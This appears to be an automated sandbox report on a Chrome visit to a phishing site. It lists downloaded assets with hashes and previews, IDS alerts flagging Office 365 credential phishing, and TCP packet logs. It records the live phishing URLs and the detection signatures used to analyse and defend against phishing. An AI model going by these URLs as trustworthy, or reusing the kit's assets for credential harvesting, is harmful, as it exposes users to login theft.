                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (370)
                                                                  Category:downloaded
                                                                  Size (bytes):1561
                                                                  Entropy (8bit):5.062665571716666
                                                                  Encrypted:false
                                                                  SSDEEP:48:AJ1olsmXgAe4zYHQTXInr1Wozy6nrKUnsDCneR+BAi:AJ1olsSJzSQkr1Zzy6WUsDCe0D
                                                                  MD5:B283E40AFE1F6AE26D240377150FEEEC
                                                                  SHA1:D18E8FBC1F2AA7FEDB894F89F17FF89BF5294EEA
                                                                  SHA-256:370625E4AC1FC003E8AFEDE69B2F175607FDD513A1503BE2B8F22996E20C1489
                                                                  SHA-512:6D0E881929E6E61DD1D280BEA6AAA20C43CA2C38184CCCF4F222D430CA71A1917343ED7E2E5C673549A1CB39161703C1A4B576A8FB6196E516438C8312330E84
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/meBubble.css
                                                                  Preview:/* Code tidied up by ScrapBook */..meBubble { color: rgb(68, 68, 68); border-image: none; border-style: solid; border-width: 3px; box-shadow: 4px 4px 3px rgb(160, 160, 160); line-height: 17px; position: absolute; width: 300px; padding: 10px; top: -40px; right: 10px; border-radius: 5px; background: transparent linear-gradient(rgb(255, 255, 255), rgb(237, 237, 237)) repeat scroll 0% 0%; display: none; }..meBubbleHeader { height: 33px; }..meBubbleLogo { }..meBubblePointer { top: 19px; position: absolute; width: 0px; height: 0px; }..meBubblePointerInner { border-style: solid; border-width: 12px; position: absolute; top: -8px; width: 0px; height: 0px; line-height: 0px; }..meBubblePointerRight { right: -2px; }..meBubblePointerRight .meBubblePointerInner { border-right-width: 0px; }..greyBubble { border-color: rgb(187, 187, 187); }..greyBubble * .meBubbleHr { color: rgb(187, 187, 187); }..greyBubble * .meBubblePointerInner { border-color: transparent rgb(187, 187, 187); -moz-border-top-color
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (350)
                                                                  Category:downloaded
                                                                  Size (bytes):2615
                                                                  Entropy (8bit):4.980975671943392
                                                                  Encrypted:false
                                                                  SSDEEP:48:ST1SdJifqLWo5xw5K15E54tUd7eM5uSXtOEgH4XtOEg6j:rjif8WuxmK15E5WUd6KucOEgHCOEgq
                                                                  MD5:1BAA1CAF5F5C4A969007B8688C6C0E9D
                                                                  SHA1:84B6F649545C00771B057503F082E832F40BC634
                                                                  SHA-256:4210D307727457D291C243822F06D2E52E57CCF5748DD041ECA850988EC7A321
                                                                  SHA-512:AD6E9550D7231739D53600ACA3DF000FE453D76F1F0A85FFB0BA94E2CD1A0BF2837A27F354035B1BF0D16F68E308EBCC70D0AB75F1B16D05780D3706144C5749
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/jquery.menu.css
                                                                  Preview:/* Code tidied up by ScrapBook */.ul.menu, ul.menu ul { list-style-type: none; float: left; width: 100%; margin: 0px; padding: 0px; background-color: white; }.ul.menu li { margin-top: 0px; float: left; width: 100%; }..menuCategory, .menuCategoryDiv { float: left; width: 100%; text-align: left; }..menuCategoryLink { cursor: pointer; display: block; text-decoration: none; font-size: 12px; font-weight: bold; margin-top: 1px; padding: 0.6em 40px 0.6em 5px; white-space: nowrap; }..menuCategoryIcon { padding-right: 5px; vertical-align: middle; border: medium none; width: 20px; height: 16px; }..menuCategoryLinkArrow { background-image: url("white_arrow.png"); background-repeat: no-repeat; background-position: 95% center; }..highlightMenuCategory .menuCategoryLink { text-decoration: none; padding: 0.6em 40px 0.6em 5px; }..highlightMenuCategory .menuCategoryLinkArrow { background-image: url("black_arrow_down.png"); background-repeat: no-repeat; background-position: 95% center; }..menuTool, .men
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):28
                                                                  Entropy (8bit):4.307354922057604
                                                                  Encrypted:false
                                                                  SSDEEP:3:YW8Q91Y:4QzY
                                                                  MD5:3CCFCCCDE92F1AB15129C0AE6DD7FFCB
                                                                  SHA1:5F8E8CEC5CAD6F478161F85CB2A505613D75CDB1
                                                                  SHA-256:D0C55A62B21B19AB740407CE222EFA8552A691900DB832D2B188D9AC553520B6
                                                                  SHA-512:2D80C8DD28F7CB905DB8E7DB0128162F6B38B7C1233AEEEFCF9467BDE307626227364E2D77AE9ACAD5879669812EB699E82E4DD226FFE2A4DFAD359E2BF01969
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwltB0QxtPcJlhIFDUPzdjkSBQ2tCa6x?alt=proto
                                                                  Preview:ChIKBw1D83Y5GgAKBw2tCa6xGgA=
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (47691)
                                                                  Category:downloaded
                                                                  Size (bytes):47692
                                                                  Entropy (8bit):5.4016459163756165
                                                                  Encrypted:false
                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js?onload=WXqDk4&render=explicit
                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 320 x 71, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):8875
                                                                  Entropy (8bit):7.968958737823871
                                                                  Encrypted:false
                                                                  SSDEEP:192:IXBYCp0nsAXXkuzDXjxGb+noXylpMTsfRyx9Hwh9bw:4KnFnkuzJGymyfzfRqJIbw
                                                                  MD5:D4B562BC44CCC2318277F0A87756F50B
                                                                  SHA1:FFB0FAF6284CDDCDA7502E6F149E0EB5ECB6420C
                                                                  SHA-256:CAB0B2E85BF0659046B38AF7F4EE2B46DC330E61C43B55690445531E6B804D13
                                                                  SHA-512:7D9E96E14283962ACE5E13CFA1BA6377DA5EDEFDCBF089D9E8B62F10C7C10BE48F5D9F4A9A5EDFF7A27130916D984AC9A443E427229396AF00F0289086A80489
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/image.png
                                                                  Preview:.PNG........IHDR...@...G.....v.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy.......g.s..{....$O../... .'..z8.W.G....x....0Y.A..@$/7.z........H..e..O...O.T...._..lN:K.."N.....3"..$..F../JP.rb.[.}..Q..d.[..S..l1..x{..#b.G...\N..o.X3I....[ql2.....$..8.x.......t..r.p../8...p...C...f.q....K.njm.{r2.8...?......).L^6..g.,.qm."[.Z[Z....~Q....7%.."....3......R..`.j...[.~.:.. w....!.$E}k...yh.y...Rm..333..........:..}.=#.v.....e...tq.X)I)B>==......<..8..X....9<QD.h..8Q.yl....sy....0.OZ.k.(...5..H....>.....yP..........:.8......p.........Lg....k.k...$.......t.!0.V..8.7....`.........2A....@.....JP..A#h.'@.8.....:....`....`......a!2D..!UH.2.. .d..A>P ..ECq...B.....*.*.Z....:.]..B..=h...~....L...2...........5p.......N..........:|......@...QC.....!.H,.G6 .H9R.. ]H/r..A..w(......Q.(OT...JCm@..*QGQ...-.(j...MF+...6h/.*t.:.]..G7....w...7......Xa<1..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (47691)
                                                                  Category:dropped
                                                                  Size (bytes):47692
                                                                  Entropy (8bit):5.4016459163756165
                                                                  Encrypted:false
                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/favicon.ico
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (2467)
                                                                  Category:downloaded
                                                                  Size (bytes):16398
                                                                  Entropy (8bit):5.263606032305571
                                                                  Encrypted:false
                                                                  SSDEEP:192:iikTQ/eh6cN2rbualhP0IBmUlaPKz572hk/tcy0X0mcwyujtWMOrOUy2mV:iigW5lhP0aTwI1eI+NV
                                                                  MD5:8E0E59ED1AD5D878F5CC9227022BDC15
                                                                  SHA1:65B0F95DD4189AB1BBB1E873CEEF4E5F5E621B98
                                                                  SHA-256:9580877BD87BFB498917F865F1468881E4AC0BAE356CC19738E2DF78AA38D781
                                                                  SHA-512:6620E518FA14959DF3387E80FACDF145CF834AB5791FF5C3F46F53C51931875ED449248FAFE2001BA6E4971116E48B809A0CDD63E2E6D3296A248150EF4552DA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.structure.css
                                                                  Preview:/* Code tidied up by ScrapBook */..ui-helper-hidden { display: none; }..ui-helper-hidden-accessible { border: 0px none; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px; }..ui-helper-reset { margin: 0px; padding: 0px; border: 0px none; outline: 0px none; line-height: 1.3; text-decoration: none; font-size: 100%; list-style: outside none none; }..ui-helper-clearfix::before, .ui-helper-clearfix::after { content: ""; display: table; border-collapse: collapse; }..ui-helper-clearfix::after { clear: both; }..ui-helper-clearfix { min-height: 0px; }..ui-helper-zfix { width: 100%; height: 100%; top: 0px; left: 0px; position: absolute; opacity: 0; }..ui-front { z-index: 100; }..ui-state-disabled { cursor: default ! important; }..ui-icon { display: block; text-indent: -99999px; overflow: hidden; background-repeat: no-repeat; }..ui-widget-overlay { position: fixed; top: 0px; left: 0px; width: 100%; height: 100%; }..ui-draggabl
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischeckedall_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_sthischecked.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (315)
                                                                  Category:downloaded
                                                                  Size (bytes):14879
                                                                  Entropy (8bit):4.893005884838999
                                                                  Encrypted:false
                                                                  SSDEEP:192:ynI2mV66f29RBSGsl53skuMaaSQhQz0aI1:0ZbSG1u
                                                                  MD5:7B272BCC0DF4E2A01638F163BEF3B5D7
                                                                  SHA1:AB44A486DA24B36A8CFBADE22E1F854270AB058E
                                                                  SHA-256:453CDB307B749D30E1A7BF4D6DB827A8DF01B3A1BE363AC9D98E6E954B9B6BA7
                                                                  SHA-512:9B5E1F5EB839414AA23F2C1D3CD91225581BF4E482FC9C6FE78C0F92867E6E448ED1007DC6C5083570226438DAD19842E007F171278890FDEC92551FCFC01115
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.theme.css
                                                                  Preview:/* Code tidied up by ScrapBook */..ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }..ui-widget .ui-widget { font-size: 1em; }..ui-widget input, .ui-widget select, .ui-widget textarea, .ui-widget button { font-family: Verdana,Arial,sans-serif; font-size: 1em; }..ui-widget-content { border: medium none; background: rgb(255, 255, 255) none repeat scroll 0% 0%; color: rgb(34, 34, 34); }..ui-widget-content a { color: rgb(34, 34, 34); }..ui-widget-header { border: medium none; background: rgb(34, 48, 140) none repeat scroll 0% 0%; color: rgb(255, 255, 255); font-weight: bold; }..ui-widget-header a { color: rgb(255, 255, 255); }..ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default { border: 1px solid rgb(211, 211, 211); background: rgb(230, 230, 230) none repeat scroll 0% 0%; font-weight: normal; color: rgb(85, 85, 85); }..ui-state-default a, .ui-state-default a:link, .ui-state-default a:visited { color: rgb(85, 85, 85); text-decor
                                                                  No static file info
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-30T22:42:33.108771+01002032516ET PHISHING Generic Multibrand NewInjection Phishing Landing Template2188.114.96.3443192.168.2.458483TCP
                                                                  2024-12-30T22:42:33.108771+01002032517ET PHISHING Generic Multibrand NewInjection Phishing Landing Template2188.114.96.3443192.168.2.458483TCP
                                                                  2024-12-30T22:42:53.737414+01002847819ETPRO PHISHING Successful Generic Phish 2021-03-251192.168.2.458532188.114.96.3443TCP
                                                                  2024-12-30T22:42:53.737599+01002037788ET PHISHING Successful Office 365 Phish 2022-07-191188.114.96.3443192.168.2.458532TCP
                                                                  2024-12-30T22:43:05.564890+01002847819ETPRO PHISHING Successful Generic Phish 2021-03-251192.168.2.458556188.114.96.3443TCP
                                                                  2024-12-30T22:43:05.564902+01002037788ET PHISHING Successful Office 365 Phish 2022-07-191188.114.96.3443192.168.2.458556TCP
                                                                  2024-12-30T22:43:17.967837+01002847819ETPRO PHISHING Successful Generic Phish 2021-03-251192.168.2.458640188.114.96.3443TCP
                                                                  2024-12-30T22:43:17.968046+01002037788ET PHISHING Successful Office 365 Phish 2022-07-191188.114.96.3443192.168.2.458640TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 30, 2024 22:42:02.279226065 CET49675443192.168.2.4173.222.162.32
                                                                  Dec 30, 2024 22:42:11.965063095 CET49675443192.168.2.4173.222.162.32
                                                                  Dec 30, 2024 22:42:14.213413954 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.213454962 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.213516951 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.213732958 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.213746071 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.929932117 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.930752993 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.930780888 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.931714058 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.931786060 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.933064938 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.933128119 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:14.981148005 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:14.981168032 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:15.028017044 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:15.696814060 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.696866989 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:15.696938992 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.697324991 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.697364092 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:15.697418928 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.697654009 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.697665930 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:15.697901964 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:15.697916031 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.188232899 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.188292027 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.192681074 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.192698002 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.193108082 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.193135023 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.193665028 CET44349739188.114.96.3192.168.2.4
